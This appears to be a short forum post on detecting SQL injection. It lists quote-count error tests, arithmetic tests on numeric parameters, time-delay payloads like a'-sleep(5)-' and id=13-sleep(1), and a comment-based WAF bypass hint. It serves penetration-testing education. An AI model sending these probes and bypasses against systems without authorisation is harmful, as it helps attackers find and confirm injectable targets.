Below, by error it means some error appears or shows some different behaviour
\ // some error or a different behaviour
\\ // no error
' // error
'' // no error, it is a single quote written twice
''' // error
'''' // no error
''''' // error
Odd number of quotes giving error
Even number of quotes not giving error
Above conditions might indicate an SQLi
further test:
a'-sleep(1)'- // delays response by more than 1 second, observe time delay (sometimes a big delay in response will cause timeout indicating possible SQLi)
a'-sleep(5)-' // delays response by more than 5 seconds
Confirms SQLi
Similar tests can be done for double quotes "
(parameters might look like numbers)
id=10 // response: A
id=11 // response: B
id=12 // response: C
id=13-1 // response: C
id=13-2 // response: B
id=13-3 // response: A
id=5*2 // response: A (5*2=10)
Above conditions might indicate an SQLi, or might indicate that our input is being interpreted somehow
id=13-sleep(1) // delay of more than 1 second in response
id=13-sleep(5) // delay of more than 5 seconds
SQLi Confirmed
One might try sleep/**/(1) OR relevant WAF bypassing paylaods if WAF is present
Comment if you have other detection ways, I might have missed some. (I'll update if I missed something)